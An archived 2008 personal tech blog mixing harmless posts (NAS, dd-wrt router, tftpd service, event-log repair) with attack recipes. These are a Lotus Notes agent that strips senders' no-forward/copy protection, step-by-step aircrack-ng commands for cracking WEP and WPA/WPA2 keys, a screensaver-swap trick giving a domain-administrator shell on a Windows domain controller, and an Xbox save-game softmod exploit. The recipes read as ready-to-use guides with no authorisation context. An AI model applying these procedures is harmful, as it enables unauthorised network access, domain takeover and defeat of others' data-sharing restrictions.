Wednesday, 17 December 2008

Remove Prevent Copy / Forward / Print From Email In Lotus Notes

I Had an issue today that required me to forward an email to a colleague to review. However the sender had prevent the "Copying" , Printing , Forwarding of this particular email and they were unable to one reason or another to resend it.

So I fired up Domino Designer and added the following agent to the "Actions" Menu of my mailfile.

I'm not going to even go into the morles and ethics of removing these so called "security features" from emails so please dont start going off on a rant.

FIELD $KeepPrivate := $KeepPrivate;
@If($KeepPrivate != "";
@Prompt([OK];"$KeepPrivate Flag Disabled";
"The selected message can now be forwarded/copied!"));
@Prompt([OK];"$KeepPrivate Flag Not found";
"The selected message does not appear to have forwarding/copying disabled.")

Budget NAS Box

I recently picked up 2 of these in Maplin along with 2x 300GB IDE hard drives.

They work out of the box. Just plug in to you existing network, setup the share name and permissions via the builtin web interface, map to the drive(s) on you workstaion and your good to go. The LANDisk can also act as a DHCP server.

I was having some intermittant issuse with one of the devices locking up so I updated the firmware. The chipset (Conceptronic CHD3NET) is the same as that used on some other devices so I loaded the latest one I cauld find from here. including bootloader.

The site also has a firmware loader to ease the update process.

One point to note is that the deivce formats the drive as FAT32 not EXT2 or NTFS. This may be an issue for you if you have files over 2GB.

Turn A Cheap Linksys Router Into A Powerful (almost) Enterprise Level Router

I picked up one of these off eBay for testing a

Linksys WRT54GS v1.1 and installed dd-wrt on it.

Its a fantastic firmware modification.
I can now setup as many vlans as I want on both the LAN and WLAN interfaces.
Its also possible to put the wireless side of the device into client mode to create a bridge.
I am currently testing the OpenVPN aspect of box. Take a look at for more info.

Tuesday, 2 December 2008

Wireless Pen-Testing

No Client WEP Cracking

This is a quick bullet point step by step guide to wireless password cracking
Your wireless interface is "ath0"

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
=== copy BSSID
airodump-ng -c -6 -w filesname --bssid ath0
aireplay-ng -1 0 -a -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b -h 00:11:22:33:44:55 ath0
aircrack-ng -n 64 OR 128 -0 --bssid filename.cap


No Client Korek Chopchop Attack

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
#ctrl+c when you see your network
#make a note of the bssid and chan
airmon-ng -c -w --bssid ath0
# leave it running ... open a new shell
aireplay-ng -1 0 -e -a -h 00:11:22:33:44:55 ath0
aireplay-ng -4 -h 00:11:22:33:44:55 -b -h 00:11:22:33:44:55 -k -l -y -w
# now to inject the ARP packet
aireplay-ng -2 -r ath0
# prompt uses this packet ?
# once you have enough packets start aircrack-ng
aircrack-ng -n 64 or 128 -z -f 1 -e -b *.cap


WPA-WPA2 Cracking

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c -w --bssid ath0
aireplay-n -0 1 -a -c ath0
Ctrl+c .. when you have handshake
aircrack-ng -w -b .cap


WPA-WPA2 With Airolib-ng Databases

# make sure you have SQLite3 installed
# install it
# download and install latest dev version of aircrack

svn co aircrack-ng
cd aircrack-ng
gmake SQLITE=trun
gmake SQLITE=true install

# create a new text file called ssidlist.txt
# enter the name of your network(s). One per line.
# the database will be created if it does not exist

airolib-ng testdb --import essid ssidlist.txt

# import your dictionary file into the database

airolib-ng testdb --import ascii passwd password.lst

# clean up the database to get rid of any errors

airolib-ng testdb clean all

# now to create the database

airolib-ng testdb batch

# once it says No free ssid found .... press Ctrl+C or it'll keep running.
# next verify the database. This will check about 1000 random PMK's

airolib-ng testdb verify

# verifys everything
airolib-ng testdb verify

# now to crack the WPA/WPA2 key

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c -w --bssid ath0
aireplay-n -0 1 -a -c ath0

# Ctrl+c .. when you have handshake

aircrack-ng -r testdb .cap

Running tftpd as a service on a windows machine

I'm using jounin's tftpd32 (download from here: ) for netbooting stations in places that I don't have UNIX servers, and found this tool very usefull.

Here is my instructions for making it a Windows Service using MS instsrv.exe and srvany.exe from Windows 2000 Resource Kit.

* Download tftpd
* Install tftpd on your system, I installed it on C:\Program Files\tftpd , and my explanation will be using this dir.
* Get the files instsrv.exe and srvany.exe from the Resource Kit and copy them to a directory on your system (I copied them to C:\Tools)
* Open a cmd (Start -> Run -> cmd) and do the followings:
o c:
o cd \Tools
o instsrv tftpd c:\Tools\srvany.exe
* Open the registry (Start -> Run -> regedt32)
* Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tftpd : create a 'Parameters' key
* Under the above key, create a new 'String Value' with the name 'Application' of type REG_SZ and specify there C:\Program Files\tftpd\tftpd32.exe
* Close your running tftpd32 (if you have one) and check with netstat -a that nothing is listenning on UDP tftpd port (69)
* Goto services (left click on "My Computer" -> Manage -> Services and Applications -> Services) and start the tftpd service.
* Check now with netstat -a that there is a sevice that listen on UDP tftpd port, the output should look like this (the important line is the last):
Windows CMD

C:\Program Files\tftpd>netstat -a

Active Connections

Proto Local Address Foreign Address State
TCP localhost:epmap localhost:0 LISTENING
TCP localhost:microsoft-ds localhost:0 LISTENING
UDP localhost:bootps *:*
UDP localhost:tftp *:*

* That's it !

Windows Password Reset

Use Petter's disk to reset the MACHINE Administrator password to "no password".

Reboot, hit F8, and enter "Directory Service Recovery Mode". The machine will boot up as a standalone server without any Active Directory support.

When the login screen appears, hit CTRL-ALT-DEL and log in as "Administrator" with no password. This is the MACHINE Administrator account, and does not have the ability to modify anything specific involving the Active Directory information, although it can backup and restore the physical files which contain the AD databases.

Run "regedit". Navigate to HKEY_USERS\.Default\Control Panel\Desktop and change the following values:
Value Original Change to
SCRNSAVE.EXE logon.scr cmd.exe
ScreenSaveTimeout 900 15

Reboot normally. When the box appears asking you to hit CTRL-ALT-DEL to log in, just wait. After 15-30 seconds you will see a command prompt appear (since that is the screensaver.)

In the command prompt, type the following command:
C:\WINNT\system32> MMC DSA.MSC

This should bring up the management console where you can edit users' passwords, including the password for the Administrator account. If you type this command and it doesn't work, wait 30 seconds and try it again. This happened to me, it sounded like it was still in the process of loading drivers into memory in the background...

If this doesn't work after waiting the 30 seconds... realize that THIS IS A COMMAND PROMPT WITH FULL DOMAIN ADMINISTRATOR RIGHTS, and you're running a command ("MMC.EXE") with another filename ("DSA.MSC") as an argument. If it "just plain doesn't work", maybe you need to locate these two files and type them in as full path names. Maybe something like "C:\WINNT\SYSTEM32\MMC.EXE C:\WINNT\SYSTEM32\DSA.MSC".

If you know absolutely nothing about how to use a command line, then reboot into DSR Mode, log in as Administrator, and use the graphical "Find Files" thingy to find the files, and write down their locations. Then try it again (reboot and wait for the command line, etc.)

After resetting the Administrator password, exit the management console and type the command EXIT in the command prompt window.

Hit CTRL-ALT-DEL and log into the DOMAIN Administrator account using the new password!

Don't forget to undo the changes you made to the registry, or you will always have a command prompt with Domain Administrator rights appear whenever somebody logs out.

Procedure For Recovering A Corrupted Event Log

On an active system, new events are written to the end of the log file. When a soft-shutdown is performed, the log data is realigned to its proper location. If a hard shutdown or live acquisition is performed, this data may not have been properly flushed creating an unreadable log file. The results in a log file is corrupt error.

Steps to Recover:

1. Copy out the Windows event log you are interested in (e.g. SecEvent.Evt, SysEvent.Evt or AppEvent.Evt).

2. Before proceeding, try to open the file with your event viewer. If you get the message, “The event log is corrupted”, then continue with the following steps.

3. Open the Event Log with a HEX file editor (e.g. UltraEdit, HexEdit, WinHex, etc).

4. Search for the ASCII (TEXT) string: 3333DDDD.

5. This puts you right in the middle of the HEX string: 11 11 11 11 22 22 22 22 33 33 33 33 44 44 44 44

6. The “11 11 11 …” hex string is the start of the log file header. The four bytes immediately preceding the “11 11 11…” should be (hex) 28 00 00 00. This is the Record Length (40 bytes).

7. Immediately following the “… 44 44 44 44” you should see a 4-byte sequence: 30 00 00 00, This is the status flag.

30 00 00 00 is “dirty”, meaning the log file has not been flushed. 01 00 00 00 is “clean”.

If you see anything else, it is probably the offset location from the start of the next record to be written to the log. You may still proceed, it can still work.

8. Make a note of the next 4-bytes. This is the ALLOCATED SIZE of the log file.

9. Make a not of the next 4-bytes. This is the NUMBER OF ACTIVE RECORDS in the log file.

10. Next, go back to the start of the log file. Now you will start manually filling in the log file header.

11. Check the first 4-bytes of the file, it should be: 30 00 00 00; If not, change it.

12. Next, go to offset 20 (Byte offset count starts at ZERO)

13. Type in the ALLOCATED SIZE bytes

14. This should put you at byte #24

15. Type in the NUMBER OF ACTIVE RECORDS bytes

16. Following this (at offset 28) should be: 01 00 00 00 (if not, change it)

17. Go to offset 36, change to: 08 00 00 00.

18. That’s it! You should now be able to open the log file with you event viewer.

How to softmod your xbox

How to softmod your xbox

This may not be the best way but its worked for me.

Your going to need the following

I dont need to say xbox do I ?? ... Internet Connection ?? ... Hard drive ??

xbox memory card. I've heard that M$ branded ones work best, I used a Mega-X-Key only cos I have one gathering dust in my box of computer bits.

Based on what other sites mention..
Any version of Tom Clancy's Splinter Cell
The original version of 007: Agent Under Fire or the Platinum Hits Agent Under Fire with the Serial #: 1448517 (NOT 1448527)
Mech Assault with the Serial #: MS02301L on the inner ring of the game CD
IRC Client
FTP Client

I picked up a copy of Splinter Cell in the Pre-Owned games section of a local store for 3 quid.

Next your going to need an All-In-One Exploit package, which you can get from xbins on irc.
If you dont know how to connect, google "xbins" theres LOTS of sites out there that explain it.

Ok ..... the voice in my head is telling me to tell you.

I Used mIRC
Go to
Download mIRC
Install mIRC

Your also going to need an FTP Client and WinRAR and Winzip or PowerArchiver or 7zip
I used 7zip its cos its free

Filezilla, SmartFTP, WS-FTP, FlashFXP, theres tons out there ... pick one.

Start IRC ... connect to an EFNet Sever anyone will do.


When your connected type

/j #xbins
/msg xbins !list

You'll get a private message from Xbins giving you the location and login to the FTP server.

The voice has told me not to tell you how to use blah blah FTP client.

But connect to the ftp server that Xbins gave you.

Browse to /XBOX/exploits/_Packages/Softmod Installer Deluxe/

Extract the following files

and copy them to your memory card or Mega-X-Key .... its attached to the PC right ?

Plug the card/key into your xbox and copy the game saves over to your xbox.

Stick in the splinter cell game and start a new game.
Select the save game called Linux

After a few seconds could be anywhere between 5-10 ... dont worry about the blank screen its normal

Select the option , Create MS Backup, this will backup the entire contents of your C:\ to

Create mod backup is supposed to backup your eeprom.
It didn't backup mine ... it just backed up the c drive again

The nice thing about the save game exploit is that you can ftp stuff to and from your xbox.

Instead of installing the softmod on my retail hard drive, I ftp'd the contents of C and E to a temp folder on my computer.

I downloaded xboxhdm v1.9 ... xbins (see IRC section) /XBOX/Operating Systems/linux/distributions/xboxhdm/
followed the instructions in the readme and created a xbox hd maker CD

Copy the contents of your xbox C Drive backup to xboxhdm\linux\C and the xbox E to xboxhdm\linux\E and the eeprom backup to xboxhdm\linux\eeprom

When all the copying has finished ... make-iso-win.bat

Burn the ISO with your fav CD Writer app ... I used Nero (It came free with the burner)

shut down your pc disconnect all drive except the cd rom !

set the drive your going to put in your xbox to CS (Cable Select)

Connect it to IDE 1 Master.

Here comes the voice again .... xboxhdm ... just boot off the CD

Time Passes

Remove the drive from your xbox

Stick in the new one.

Fire up splinter cell

load up the Linux save game.

install the softmod ... this way if it goes belly up ... you can just pop in the retail drive and its all ok again, make sure you copied eeprom.bin over to the eeprom folder !

copied over an updated version of XBMC or DVD2XBOX to e\apps

Now I was a wee bit upset to find that F was not as big as I thought it was going to be, I put a 250GB drive in there.

Google time passes

Found XBpartitioner_1.0RC1.rar ... xbins

unrar .. copied XBpartitioner to the xbox.

Evox did not see it as an app ... prob some setting in evox.ini
Fired up xbmc went to file browsed to e\apps\XBpartitioner and launched it from there !

voice is saying read the help file. I choose the option of having F 240GB
format drive
reboot xbox .... just because.